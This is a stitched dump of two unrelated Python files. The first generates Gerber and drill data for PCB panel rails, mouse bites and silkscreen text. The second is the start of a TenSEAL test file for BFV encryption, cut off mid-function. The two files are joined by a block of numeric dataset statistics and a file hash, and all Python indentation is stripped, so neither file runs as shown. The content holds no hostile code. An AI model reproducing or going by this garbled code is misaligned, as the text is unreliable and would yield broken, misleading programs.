data += 'X{}Y{}D01*\n'.format(generate_float46(max_x), generate_float46(max_y))
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x), generate_float46(max_y))
data += 'X{}Y{}D01*\n'.format(generate_float46(max_x), generate_float46(max_y))
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x), generate_float46(max_y))
data += 'X{}Y{}D01*\n\n'.format(generate_float46(min_x), generate_float46(min_y))
# if vcut and panels > 1:
# available = width - (float(panels-1) * gap)
# section = available / float(panels)
# x = min_x - (gap/2.0)
# for i in range(0, panels-1):
# x += section + gap
# data += 'X{}Y{}D02*\n'.format(generate_float46(x), generate_float46(max_y))
# data += 'X{}Y{}D01*\n'.format(generate_float46(x), generate_float46(min_y))
# data += '\n\n'
data += 'M02*\n'
return data
def generate_jlcjlcjlcjlc_text_data(origin, aperture):
ox = origin[0]
oy = origin[1]
data = ''
data += 'D{}*\n'.format(aperture)
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.4110), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.4110), generate_float46(oy-0.1667))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.3633), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.2681), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.1252), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0300), generate_float46(oy-0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+1.3633), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8871), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8871), generate_float46(oy+0.5476))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+2.2681), generate_float46(oy-0.3571))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.2205), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.0776), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.9824), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.8395), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.7443), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.6967), generate_float46(oy-0.2143))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.6490), generate_float46(oy-0.0238))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.6490), generate_float46(oy+0.1190))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.6967), generate_float46(oy+0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.7443), generate_float46(oy+0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.8395), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.9824), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.0776), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.2205), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.2681), generate_float46(oy+0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+2.9824), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.9824), generate_float46(oy-0.1667))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.9348), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.8395), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.6967), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.6014), generate_float46(oy-0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+3.9348), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+3.4586), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+3.4586), generate_float46(oy+0.5476))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+4.8395), generate_float46(oy-0.3571))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.7919), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.6490), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.5538), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.4110), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.3157), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.2681), generate_float46(oy-0.2143))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.2205), generate_float46(oy-0.0238))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.2205), generate_float46(oy+0.1190))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.2681), generate_float46(oy+0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.3157), generate_float46(oy+0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.4110), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.5538), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.6490), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.7919), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.8395), generate_float46(oy+0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+5.5538), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+5.5538), generate_float46(oy-0.1667))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+5.5062), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+5.4110), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+5.2681), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+5.1729), generate_float46(oy-0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+6.5062), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.0300), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.0300), generate_float46(oy+0.5476))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+7.4110), generate_float46(oy-0.3571))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.3633), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.2205), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.1252), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.9824), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.8871), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.8395), generate_float46(oy-0.2143))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.7919), generate_float46(oy-0.0238))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.7919), generate_float46(oy+0.1190))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.8395), generate_float46(oy+0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.8871), generate_float46(oy+0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.9824), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.1252), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.2205), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.3633), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.4110), generate_float46(oy+0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+8.1252), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+8.1252), generate_float46(oy-0.1667))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+8.0776), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.9824), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.8395), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.7443), generate_float46(oy-0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+9.0776), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+8.6014), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+8.6014), generate_float46(oy+0.5476))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+9.9824), generate_float46(oy-0.3571))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.9348), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.7919), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.6967), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.5538), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.4586), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.4110), generate_float46(oy-0.2143))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.3633), generate_float46(oy-0.0238))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.3633), generate_float46(oy+0.1190))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.4110), generate_float46(oy+0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.4586), generate_float46(oy+0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.5538), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.6967), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.7919), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.9348), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.9824), generate_float46(oy+0.4524))
data += '\n'
return data
def generate_vscore_text_data(origin, aperture):
ox = origin[0]
oy = origin[1]
data = ''
data += 'D{}*\n'.format(aperture)
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+0.8500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8393), generate_float46(oy+1.0833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+1.3167))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.5536), generate_float46(oy+1.5500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.5536), generate_float46(oy+2.0833))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.7679), generate_float46(oy+2.8167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8036), generate_float46(oy+2.7833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8393), generate_float46(oy+2.6833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8393), generate_float46(oy+2.6167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8036), generate_float46(oy+2.5167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.7321), generate_float46(oy+2.4500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.6607), generate_float46(oy+2.4167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.5179), generate_float46(oy+2.3833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.4107), generate_float46(oy+2.3833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.2679), generate_float46(oy+2.4167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.1964), generate_float46(oy+2.4500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.1250), generate_float46(oy+2.5167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+2.6167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+2.6833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.1250), generate_float46(oy+2.7833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.1607), generate_float46(oy+2.8167))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+3.1167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.6964), generate_float46(oy+3.1167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.7679), generate_float46(oy+3.1500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8036), generate_float46(oy+3.1833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8393), generate_float46(oy+3.2500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8393), generate_float46(oy+3.3833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8036), generate_float46(oy+3.4500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.7679), generate_float46(oy+3.4833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.6964), generate_float46(oy+3.5167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+3.5167))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+3.7500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+4.1500))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.8393), generate_float46(oy+3.9500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+3.9500))
data += '\n'
return data
def generate_rail_gto_data(origin, size, panels, gap, vcut, jlc):
min_x = origin[0]
min_y = origin[1]
max_x = min_x+size[0]
max_y = min_y+size[1]
width = size[0]
height = size[1]
data = ''
data += '%TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '%TF.SameCoordinates,Original*%\n'
data += '%TF.FileFunction,Legend,Top*%\n'
data += '%TF.FilePolarity,Positive*%\n'
data += '%FSLAX46Y46*%\n'
data += 'G04 Gerber Fmt 4.6, Leading zero omitted, Abs format (unit mm)*\n'
data += 'G04 Created by {}*\n\n'.format(APP_STR)
data += '%MOMM*%\n'
data += '%LPD*%\n\n'
data += 'G04 APERTURE LIST*\n'
data += '%TA.AperFunction,Profile*%\n'
data += '%ADD10C,0.150000*%\n'
data += '%ADD11C,0.125000*%\n'
data += 'G04 APERTURE END LIST*\n\n'
if jlc:
data += generate_jlcjlcjlcjlc_text_data(origin=(8.0, height/2.0), aperture=10)
if vcut and panels > 1:
data += 'D10*\n'
available = width - (float(panels-1) * gap)
section = available / float(panels)
x = min_x - (gap/2.0)
for i in range(0, int(panels-1)):
x += section + gap
data += 'X{}Y{}D02*\n'.format(generate_float46(x), generate_float46(max_y))
data += 'X{}Y{}D01*\n'.format(generate_float46(x), generate_float46(min_y))
data += generate_vscore_text_data(origin=(x+0.5, 0.0), aperture=11)
data += 'M02*\n'
return data
def generate_rail_gbo_data(origin, size):
min_x = origin[0]
min_y = origin[1]
max_x = min_x+size[0]
max_y = min_y+size[1]
width = size[0]
height = size[1]
data = ''
data += '%TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '%TF.SameCoordinates,Original*%\n'
data += '%TF.FileFunction,Legend,Top*%\n'
data += '%TF.FilePolarity,Positive*%\n'
data += '%FSLAX46Y46*%\n'
data += 'G04 Gerber Fmt 4.6, Leading zero omitted, Abs format (unit mm)*\n'
data += 'G04 Created by {}*\n\n'.format(APP_STR)
data += '%MOMM*%\n'
data += '%LPD*%\n\n'
data += 'G04 APERTURE LIST*\n'
data += '%TA.AperFunction,Profile*%\n'
data += '%ADD10C,0.100000*%\n'
data += 'G04 APERTURE END LIST*\n\n'
data += 'D10*\n'
margin = 0.5
y_major = (0.5 * height) - margin
y_minor = (0.4 * height) - margin
y_tick = (0.3 * height) - margin
# metric ruler
for x in range(0, int(width)+1):
y = y_tick
if (x % 5) == 0:
y = y_minor
if (x % 10) == 0:
y = y_major
pos = width - x
data += 'X{}Y{}D02*\n'.format(generate_float46(pos), generate_float46(min_y+y))
data += 'X{}Y{}D01*\n'.format(generate_float46(pos), generate_float46(min_y))
# imperial ruler (mm to inch)
width_imp = (width / 25.4) * 16.0
for x in range(0, int(width_imp)):
y = y_tick
if (x % 8) == 0:
y = y_minor
if (x % 16) == 0:
y = y_major
pos = (x/25.4) * 16.0 * 2.54
data += 'X{}Y{}D02*\n'.format(generate_float46(pos), generate_float46(max_y))
data += 'X{}Y{}D01*\n'.format(generate_float46(pos), generate_float46(max_y-y))
data += 'M02*\n'
return data
def generate_rail_gtl_data(origin, size):
min_x = origin[0]
min_y = origin[1]
width = size[0]
height = size[1]
max_x = min_x+width
max_y = min_y+height
offset = 5.0
x = min_x + offset
y = min_x + (height / 2.0)
data = ''
data += '%TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '%TF.SameCoordinates,Original*%\n'
data += '%TF.FileFunction,Copper,L1,Top*%\n'
data += '%TF.FilePolarity,Positive*%\n'
data += '%FSLAX46Y46*%\n'
data += 'G04 Gerber Fmt 4.6, Leading zero omitted, Abs format (unit mm)*\n'
data += 'G04 Created by {}*\n\n'.format(APP_STR)
data += '%MOMM*%\n'
data += '%LPD*%\n\n'
data += 'G04 APERTURE LIST*\n'
data += '%TA.AperFunction,SMDPad,CuDef*%\n'
data += '%ADD10C,1.000000*%\n'
data += '%TD*%\n'
data += 'G04 APERTURE END LIST*\n'
data += 'D10*\n\n'
data += 'G01*\n'
data += 'X{}Y{}D03*\n'.format(generate_float46(x), generate_float46(y))
gap = 10.0
while x < (max_x-gap-offset):
x += gap
data += 'X{}Y{}D03*\n'.format(generate_float46(x), generate_float46(y))
data += 'M02*\n'
return data
def generate_rail_gts_data(origin, size):
min_x = origin[0]
min_y = origin[1]
width = size[0]
height = size[1]
max_x = min_x+width
max_y = min_y+height
offset = 5.0
x = min_x + offset
y = min_x + (height / 2.0)
data = ''
data += '%TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '%TF.SameCoordinates,Original*%\n'
data += '%TF.FileFunction,Soldermask,Top*%\n'
data += '%TF.FilePolarity,Negative*%\n'
data += '%FSLAX46Y46*%\n'
data += 'G04 Gerber Fmt 4.6, Leading zero omitted, Abs format (unit mm)*\n'
data += 'G04 Created by {}*\n\n'.format(APP_STR)
data += '%MOMM*%\n'
data += '%LPD*%\n\n'
data += 'G04 APERTURE LIST*\n'
data += '%TA.AperFunction,SMDPad,CuDef*%\n'
data += '%ADD10C,2.000000*%\n'
data += 'G04 APERTURE END LIST*\n'
data += 'D10*\n\n'
data += 'G01*\n'
data += 'X{}Y{}D03*\n'.format(generate_float46(x), generate_float46(y))
gap = 10.0
while x < (max_x-gap-offset):
x += gap
data += 'X{}Y{}D03*\n'.format(generate_float46(x), generate_float46(y))
data += 'M02*\n'
return data
def generate_mouse_bite_drl_data(origin, size, radius, space):
min_x = origin[0]
min_y = origin[1]
max_x = min_x+size[0]
max_y = min_y+size[1]
width = size[0]
height = size[1]
diameter = 2.0*radius
data = ''
data += 'M48'
data += '; DRILL file {{{}}}\n'.format(APP_STR)
data += '; FORMAT={{-:-/ absolute / metric / decimal}}\n'
data += '; #@! TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '; #@! TF.FileFunction,NonPlated,1,2,NPTH\n'
data += 'FMAT,2\n'
data += 'METRIC\n\n'
data += '; #@! TA.AperFunction,NonPlated,NPTH,ComponentDrill\n'
data += 'T1C{:0.3f}\n'.format(diameter)
data += '%\n'
data += 'G90\n'
data += 'G05\n'
data += 'T1\n'
unit = (radius + space + radius)
count = int(width / unit) - 2
cx = min_x + (width / 2.0)
data += 'X{}Y{}\n'.format(generate_decfloat3(cx), generate_decfloat3(min_y))
data += 'X{}Y{}\n'.format(generate_decfloat3(cx), generate_decfloat3(max_y))
x = 0
for i in range(0, count):
x += unit
data += 'X{}Y{}\n'.format(generate_decfloat3(cx+x), generate_decfloat3(min_y))
data += 'X{}Y{}\n'.format(generate_decfloat3(cx-x), generate_decfloat3(min_y))
data += 'X{}Y{}\n'.format(generate_decfloat3(cx+x), generate_decfloat3(max_y))
data += 'X{}Y{}\n'.format(generate_decfloat3(cx-x), generate_decfloat3(max_y))
data += 'M30\n'
return data
def render_pcb_layer(bounds, layer, path, filename, outline=False, verbose=False):
if bounds is None:
bounds = layer.bounds
size = bounds_to_size(bounds)
resolution = size_to_resolution(size, PIXELS_PER_MM, PIXELS_SIZE_MIN, PIXELS_SIZE_MAX)
ctx = GerberCairoContext(resolution)
if outline:
ctx.get_outline_mask(layer, os.path.join(path, filename+'_mask'),
bounds=bounds, verbose=verbose)
ctx.render_clipped_layer(layer, False, os.path.join(path, filename),
theme.THEMES['Mask'], bounds=bounds, verbose=verbose)
def save_mouse_bite_gm1(path, origin, size, arc, close):
gm1 = generate_mouse_bite_gm1_data(origin, size, arc, close)
with open(os.path.join(path, 'Mouse_Bites-Edge_Cuts.gm1'), "w") as text_file:
text_file.write(gm1)
def render_mouse_bite_gm1(path, filename, origin, size, arc, close):
gm1 = generate_mouse_bite_gm1_data(origin, size, arc, close)
data = rs274x.loads(gm1, 'dummy.gm1')
layer = PCBLayer.from_cam(data)
render_pcb_layer(layer.bounds, layer, path, filename, outline=True)
def save_mouse_bite_drl(path, origin, size, radius, space):
drl = generate_mouse_bite_drl_data(origin, size, radius, space)
with open(os.path.join(path, 'Mouse_Bites-NPTH.drl'), "w") as text_file:
text_file.write(drl)
def render_mouse_bite_drl(path, filename, origin, size, radius, gap):
drl = generate_mouse_bite_drl_data(origin, size, radius, gap)
data = excellon.loads(drl, 'dummy.drl')
layer = PCBLayer.from_cam(data)
render_pcb_layer(layer.bounds, layer, path, filename)
def save_rail_gm1(path, origin, size, panels, gap, vcut):
gm1 = generate_rail_gm1_data(origin, size, panels, gap, vcut)
with open(os.path.join(path, 'Rails-Edge_Cuts.gm1'), "w") as text_file:
text_file.write(gm1)
def render_rail_gm1(path, filename, origin, size, panels, gap, vcut):
gm1 = generate_rail_gm1_data(origin, size, panels, gap, vcut)
data = rs274x.loads(gm1, 'dummy.gm1')
layer = PCBLayer.from_cam(data)
render_pcb_layer(layer.bounds, layer, path, filename, outline=True)
return layer.bounds
def save_rail_gtl(path, origin, size):
gtl = generate_rail_gtl_data(origin, size)
with open(os.path.join(path, 'Rails-F_Cu.gtl'), "w") as text_file:
text_file.write(gtl)
def render_rail_gtl(bounds, path, filename, origin, size):
gtl = generate_rail_gtl_data(origin, size)
data = rs274x.loads(gtl, 'dummy.gtl')
layer = PCBLayer.from_cam(data)
render_pcb_layer(bounds, layer, path, filename)
def save_rail_gts(path, origin, size):
gts = generate_rail_gts_data(origin, size)
with open(os.path.join(path, 'Rails-F_Mask.gts'), "w") as text_file:
text_file.write(gts)
def render_rail_gts(bounds, path, filename, origin, size):
gts = generate_rail_gts_data(origin, size)
data = rs274x.loads(gts, 'dummy.gts')
layer = PCBLayer.from_cam(data)
render_pcb_layer(bounds, layer, path, filename)
def save_rail_gto(path, origin, size, panels, gap, vcut, jlc):
gto = generate_rail_gto_data(origin, size, panels, gap, vcut, jlc)
with open(os.path.join(path, 'Rails-F_Silkscreen.gto'), "w") as text_file:
text_file.write(gto)
def save_rail_gbo(path, origin, size):
gbo = generate_rail_gbo_data(origin, size)
with open(os.path.join(path, 'Rails-B_Silkscreen.gbo'), "w") as text_file:
text_file.write(gbo)
def render_rail_gto(bounds, path, filename, origin, size, panels, gap, vcut, jlc):
gto = generate_rail_gto_data(origin, size, panels, gap, vcut, jlc)
data = rs274x.loads(gto, 'dummy.gto')
layer = PCBLayer.from_cam(data)
render_pcb_layer(bounds, layer, path, filename)
| 44.740838
| 120
| 0.640834
| 5,370
| 34,182
| 3.931471
| 0.078212
| 0.252226
| 0.050872
| 0.180277
| 0.823323
| 0.791067
| 0.775767
| 0.757815
| 0.744932
| 0.724327
| 0
| 0.10121
| 0.1681
| 34,182
| 763
| 121
| 44.799476
| 0.641229
| 0.051167
| 0
| 0.413735
| 0
| 0
| 0.166281
| 0.037102
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045226
| false
| 0.001675
| 0.025126
| 0
| 0.090452
| 0.015075
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c069ea307408494deba08e7d92a8e26037b9a8f7
| 5,578
|
py
|
Python
|
tests/sealapi/test_encrypt_decrypt.py
|
DreamingRaven/TenSEAL
|
fce3761e38bf87934037eb8631865e18520d1e4b
|
[
"Apache-2.0"
] | null | null | null |
tests/sealapi/test_encrypt_decrypt.py
|
DreamingRaven/TenSEAL
|
fce3761e38bf87934037eb8631865e18520d1e4b
|
[
"Apache-2.0"
] | null | null | null |
tests/sealapi/test_encrypt_decrypt.py
|
DreamingRaven/TenSEAL
|
fce3761e38bf87934037eb8631865e18520d1e4b
|
[
"Apache-2.0"
] | null | null | null |
import sys, os
import pytest
import tenseal.sealapi as sealapi
from tempfile import NamedTemporaryFile
from pathlib import Path
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from utils import *
def test_encryptor_bfv():
poly_modulus_degree = 4096
plain_modulus = 1024
ctx = helper_context_bfv(poly_modulus_degree, plain_modulus)
keygen = sealapi.KeyGenerator(ctx)
intenc = sealapi.IntegerEncoder(ctx)
public_key = keygen.public_key()
secret_key = keygen.secret_key()
decryptor = sealapi.Decryptor(ctx, secret_key)
expected_value = 1234
plaintext = intenc.encode(expected_value)
def _test_encryptor_symmetric_setup(encryptor):
# encrypt symmetric
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt_symmetric(plaintext, ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == expected_value
tmp = NamedTemporaryFile()
serial = encryptor.encrypt_symmetric(plaintext)
serial.save(tmp.name)
assert Path(tmp.name).stat().st_size > 0
plaintext_out.set_zero()
# zero symmetric
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt_zero_symmetric(ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == 0
tmp = NamedTemporaryFile()
serial = encryptor.encrypt_zero_symmetric()
serial.save(tmp.name)
assert Path(tmp.name).stat().st_size > 0
plaintext_out.set_zero()
# zero symmetric parms_id
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt_zero_symmetric(ctx.last_parms_id(), ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == 0
tmp = NamedTemporaryFile()
serial = encryptor.encrypt_zero_symmetric(ctx.last_parms_id())
serial.save(tmp.name)
assert Path(tmp.name).stat().st_size > 0
def _test_encryptor_pk_setup(encryptor):
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt(plaintext, ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == expected_value
plaintext_out.set_zero()
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt_zero(ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == 0
plaintext_out.set_zero()
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt_zero(ctx.last_parms_id(), ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == 0
plaintext_out.set_zero()
encryptor = sealapi.Encryptor(ctx, public_key)
_test_encryptor_pk_setup(encryptor)
encryptor = sealapi.Encryptor(ctx, public_key, secret_key)
_test_encryptor_symmetric_setup(encryptor)
_test_encryptor_pk_setup(encryptor)
encryptor = sealapi.Encryptor(ctx, secret_key)
_test_encryptor_symmetric_setup(encryptor)
encryptor = sealapi.Encryptor(ctx, public_key)
encryptor.set_secret_key(secret_key)
_test_encryptor_pk_setup(encryptor)
_test_encryptor_symmetric_setup(encryptor)
encryptor = sealapi.Encryptor(ctx, secret_key)
encryptor.set_public_key(public_key)
_test_encryptor_pk_setup(encryptor)
_test_encryptor_symmetric_setup(encryptor)
def test_encryptor_bfv_batch():
batch = [1, 2, 3, 4, 5]
poly_modulus_degree = 8192
plain_modulus = 1032193
ctx = helper_context_bfv(poly_modulus_degree, plain_modulus)
keygen = sealapi.KeyGenerator(ctx)
batchenc = sealapi.BatchEncoder(ctx)
public_key = keygen.public_key()
secret_key = keygen.secret_key()
decryptor = sealapi.Decryptor(ctx, secret_key)
